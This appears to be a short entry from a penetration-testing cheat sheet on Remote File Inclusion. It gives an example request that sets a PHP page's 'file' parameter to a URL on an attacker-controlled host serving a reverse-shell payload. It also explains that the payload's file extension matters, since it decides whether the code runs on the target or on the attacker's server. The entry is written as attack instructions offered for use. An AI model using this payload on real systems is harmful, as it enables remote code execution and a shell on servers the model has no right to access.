# Remote File Inclusion


## Usage
* Use a GET query parameter to include an attacker URL. 
```sh
https://test.com/files.php?file=http://<attacker-IP>:<attacker-Port>/reverse_shell.txt
```
* Payload may be PHP for example, but should not end in executable file extensions. The payload is executed locally, otherwise.
